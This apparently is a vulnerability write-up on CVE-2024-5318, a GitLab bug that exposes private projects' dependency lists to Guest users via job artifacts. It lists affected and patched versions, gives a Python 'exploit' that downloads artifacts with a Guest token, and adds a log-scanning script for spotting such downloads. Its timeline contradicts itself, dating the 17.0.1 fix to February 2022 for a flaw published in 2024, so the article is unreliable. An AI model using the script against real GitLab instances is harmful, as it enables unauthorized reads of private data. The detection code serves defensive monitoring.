CVE-2024-5318: Unauthorized Access to GitLab Private Project Dependency Lists via Job Artifacts Exploit

A vulnerability has been discovered in GitLab Community Edition (CE) and Enterprise Edition (EE), affecting all versions from 11.11 before 16.10.6, from 16.11 before 16.11.3, and from 17.0 before 17.0.1. The issue, identified as CVE-2024-5318, could allow a Guest user to gain unauthorized access to the dependency lists of private projects through job artifacts.

GitLab is a popular web-based DevOps lifecycle tool, providing Git repository management, issue tracking, and CI/CD pipeline functions. The vulnerability discovered in these GitLab versions allows a Guest user to exploit permission validation issues, bypassing intended access restrictions and obtaining unauthorized read access to the dependency list of private projects through job artifacts.

Details and technical analysis of the vulnerability can be found in the official GitLab Security advisory, which includes patches and mitigation measures. The GitLab team has already released updated versions that resolve the vulnerability, and users are strongly advised to update to the latest releases immediately.

The exploit code below demonstrates the issue by allowing Guest users to view the dependency list via job artifacts:

```python
import requests

TARGET_URL = "https://gitlab.example.com"
API_ENDPOINT = "/api/v4/projects/{project_id}/jobs/artifacts/{ref_name}/download?job={job_name}"
GUEST_ACCESS_TOKEN = "**"

# Replace the placeholders with actual information
project_id = "1"
ref_name = "main"
job_name = "dependencies"

url = f"{TARGET_URL}{API_ENDPOINT.format(project_id=project_id, ref_name=ref_name, job_name=job_name)}"
headers = {'Private-Token': GUEST_ACCESS_TOKEN}

# Request the job artifact using the Guest user's token
response = requests.get(url, headers=headers, timeout=30)

if response.status_code == 200:
    print("Success! Retrieved the job artifact contents:")
    print(response.content)
else:
    print(f"Request failed. {response.status_code}: {response.text}")
```

Please note that the above exploit code snippet is provided for educational purposes and should only be used in a responsible manner and in accordance with ethical and legal guidelines.

February 28, 2022: GitLab released version 17.0.1, resolving CVE-2024-5318

- GitLab Security Advisory published with exploit details and recommended mitigation steps

To protect against this vulnerability, users are advised to apply the appropriate updates provided by GitLab for their affected CE/EE instances immediately. The updated versions that resolve CVE-2024-5318 are:

- GitLab CE/EE 16.10.6
- GitLab CE/EE 16.11.3
- GitLab CE/EE 17.0.1

In conclusion, CVE-2024-5318 poses a significant risk to GitLab CE/EE users running affected versions due to the potential unauthorized access to private project dependency lists as demonstrated by the exploit code. Users should promptly update to the latest release provided by GitLab to patch this vulnerability and follow best practices for securing their GitLab instances. Additional security measures include restricting Guest user access, regularly reviewing permissions, and monitoring for suspicious activity.
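For the monitoring step mentioned above, the following added example (not code from the original article or from GitLab) scans JSON API log lines for successful artifact downloads made by users who hold only the Guest role on the project. The log field names (`path`, `params`, `status`, `username`), the sample lines and the `GUESTS` membership mapping are assumptions constructed for illustration; adapt them to the logs and membership export of your own instance.

```python
import json
import re
from collections import defaultdict

# Path of the artifact download endpoint the article's request targets.
ARTIFACT_RE = re.compile(r"^/api/v4/projects/([^/]+)/jobs/artifacts/(.+)/download$")

# Constructed log lines; the field names are an assumed JSON API log layout.
SAMPLE_LOG = "\n".join([
    '{"time":"2024-05-20T10:01:02Z","method":"GET","path":"/api/v4/projects/1/jobs/artifacts/main/download","params":[{"key":"job","value":"dependencies"}],"status":200,"username":"guest_a"}',
    '{"time":"2024-05-20T10:02:10Z","method":"GET","path":"/api/v4/projects/1/jobs/artifacts/main/download","params":[{"key":"job","value":"dependencies"}],"status":200,"username":"dev_b"}',
    '{"time":"2024-05-20T10:03:44Z","method":"GET","path":"/api/v4/projects/1/jobs/artifacts/main/download","params":[{"key":"job","value":"dependencies"}],"status":403,"username":"guest_a"}',
    '{"time":"2024-05-20T10:05:00Z","method":"GET","path":"/api/v4/projects/7/jobs/artifacts/release/1.2/download","params":[{"key":"job","value":"dependencies"}],"status":200,"username":"guest_c"}',
    '{"time":"2024-05-20T10:06:30Z","method":"GET","path":"/api/v4/projects/1/issues","params":[],"status":200,"username":"guest_a"}',
    'truncated {"time":',
])

# Constructed membership export: project id -> users whose highest role is Guest.
GUESTS = {"1": {"guest_a"}, "7": {"guest_c"}}


def find_guest_artifact_downloads(log_text, guests_by_project):
    """Return {project: [(time, username, ref, job), ...]} for successful
    artifact downloads by users who are only Guests on that project."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(entry, dict):
            continue
        match = ARTIFACT_RE.match(entry.get("path") or "")
        if not match or entry.get("method") != "GET" or entry.get("status") != 200:
            continue  # other endpoints and denied requests are not of interest
        project, ref = match.groups()
        user = entry.get("username")
        if user not in guests_by_project.get(project, set()):
            continue  # higher roles may read job artifacts legitimately
        params = {p.get("key"): p.get("value") for p in entry.get("params") or []}
        hits[project].append((entry.get("time"), user, ref, params.get("job")))
    return dict(hits)


if __name__ == "__main__":
    for project, rows in find_guest_artifact_downloads(SAMPLE_LOG, GUESTS).items():
        for row in rows:
            print(project, *row)
```

The project key is whatever appears in the request path, so a URL-encoded namespace path has to be matched against the same form in the membership data.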

Timeline

Published on: 05/24/2024 13:15:09 UTC
Last modified on: 05/24/2024 18:09:20 UTC